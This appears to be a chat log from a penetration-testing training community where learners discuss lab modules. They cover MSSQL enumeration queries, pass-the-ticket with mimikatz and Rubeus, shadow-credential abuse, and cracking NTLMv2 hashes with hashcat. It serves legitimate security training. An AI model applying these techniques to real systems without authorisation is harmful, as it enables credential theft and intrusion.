*made no difference
one thing i wanna ask that confusing me in this module
You're right. I just tested. I must've made a syntax mistake earlier.
So just to be clear -windows-auth is used for local accounts. When do you have to specify the server/hostname? In the section it says something about .\username that I don't quite understand.
i read this structure before and after every service attack as mentioned in the module. suppose it is about one service like rdp; reading the section fits this structure for every service. we can clear our concepts and keep this structure in mind. So what do you think, can it help us more? @cloud urchin @fathom pendant
is it only for understanding about every service attack? or something else.
for windows domain joined accounts .\ tells the system that you want to log in to a local account
this is a very broad view of attacks
tbh some things don't fit neatly into these sorts of categories/don't have every aspect of one point
got it
source: what you're using
Processes: What's taking the request
Privileges: What privileges does your access to the process give you
Destination: what do you now have access to
the reason destination loops back to source is because attacks can be recursive in nature
see for instance: privilege escalation
the source then becomes your user, the process would be whatever process handles your privesc request...
yeah i did research and cleared my concepts but i want to ask how it can help us in practice or do we have to just keep it in mind
it's just something to think about
hmm
enumeration is always step 0 when you get access to a user
what can you do; what can you access
thanks for your effort and time
what do you have access of that you likely shouldn't
point
for instance with linux systems: what sudo perms do you have
thats it i want to hear
i just confused now you make it clear
most times you only care about what you can access and what privileges you have
absolutely
the processes that handle getting what you want are mostly trivial
thanks for your great time. will meet again👍🏻
in the Network Introduction, why does it show 8 Octets in a row for one address?
ipv6?
This is one row:
Subnet mask:
1111 1111 1111 1111
1111 1111 1100 0000
=
255.255.255.192
hi
I am working on the machine Funnel.
facing this error
psql -U christine -p 1234 -h localhost
psql: error: connection to server at "localhost" (::1), port 1234 failed: Connection refused
Is the server running on that host and accepting TCP/IP connections?
connection to server at "localhost" (127.0.0.1), port 1234 failed: Connection refused
Is the server running on that host and accepting TCP/IP connections?
please help
Those are only 4 octets (split in the middle for readability I would assume)
Lmao thanks 😂😂😂
1 digit = 1 bit, ipv4 has 32 bits, each octet is 8 bits
Hello. Excuse me, I think (https://academy.hackthebox.com/module/112/section/1067), Find out which domain the server belongs to. Any idea about this? I tried using (nbtscan, smbclient -L //10.129.83.19 -U %) without much result
What about the other tools discussed in that section?
Hold on, I'll try again.
Thanks, found the original that was right in front of my eyes all along DEVOPS
for Password attacks: pass the ticket for windows, Do you have to get mimikatz and rubeus onto the client yourself? I've rdp'd on and try to use mimikatz and rubeus but getting the error "not recognized" for both
https://academy.hackthebox.com/module/116/section/1169
hello, stuck on this, I logged in with mssqlclient.py but I am unable to see table names or database names.
Hii is there anyone from HTB support around
show databases is for MySQL, not MSSQL
For MSSQL you'll use those basic commands:
SELECT name FROM master.dbo.sysdatabases list database names
use <the database you want to use>
SELECT * FROM <the database you want to use>.INFORMATION_SCHEMA.TABLES list the tables of a db
SELECT * FROM <some table> get all the data in a table
doesnt seem to work for some reason
It should, but indeed in the commands that you wrote some should have work
Did you try to use an other client, like sqlcmd/sqsh
let me try that, on pwnbox
refuses to connect
thanks, got it
Does anyone know the reason why only mssqlclient.py works and not sqsh for these challenge questions?
skills assessments? or for this particular section, only sqlcmd worked for me
Yeah, just for the skill assessment in this section.
Sqlcmd? Didn't you use a Linux attack host? Sqlcmd is a tool for Windows.
For me (kali linux) it was the opposite, sqsh didn't but impacket-mssqlclient did
Yeah, it was the same for me. Do you know the reason why sqsh didn't work?
Sadly no, but I would like an explanation too
nah its the only thing working on pwnbox
a lil help here, found the hash for the user in the question, how to get the password? tried cracking with rockyou, doesn't work
Hi, everyone. Started DACL Attacks 2 and detected some bug in infrastructure(?). We must abuse shadow creds and compromise PSTEST001, but gabriel doesn't have edges with user PCTEST001, but Martha does
What mode did you use with hashcat? Cuz I used rockyou and got the password.
-m 1000 for ntlm?
yes
It's an NTLMv2 hash. So you have to use a different mode.
I see
why does it give so many outputs
Also, you have to use the entire hash, you extracted a part of the hash here.
No idea since I've never actually used the hashid command.
this much?
I normally just identify the hash based on the output I get it from.